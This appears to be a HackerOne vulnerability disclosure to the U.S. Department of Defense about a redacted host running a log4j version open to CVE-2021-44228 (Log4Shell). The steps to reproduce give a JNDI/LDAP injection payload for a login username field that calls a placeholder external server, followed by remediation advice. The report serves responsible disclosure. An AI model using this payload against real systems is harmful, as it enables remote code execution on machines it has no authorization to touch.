Lucene search

K
hackeroneAlex_gaynorH1:1423496
HistoryDec 11, 2021 - 12:16 a.m.

U.S. Dept Of Defense: ██████████ running a vulnerable log4j

2021-12-1100:16:38
alex_gaynor
hackerone.com
107

0.975 High

EPSS

Percentile

100.0%

Description:

https://vulners.com/cve/CVE-2021-44228

Impact

Probably arbitrary code execution

System Host(s)

████████

Affected Product(s) and Version(s)

CVE Numbers

CVE-2021-44228

Steps to Reproduce

  1. Browse to https://████████/███████https%3A%2F%2F█████████%2F
  2. Enter a ${jndi:ldap://dns-server-yoi-control/a} into the username field
  3. Enter a random password
  4. Submit

Observe that a request was made to your DNS server. This strongly suggests a vulnerable log4j.

Suggested Mitigation/Remediation Actions

Update log4j or disable jndi support.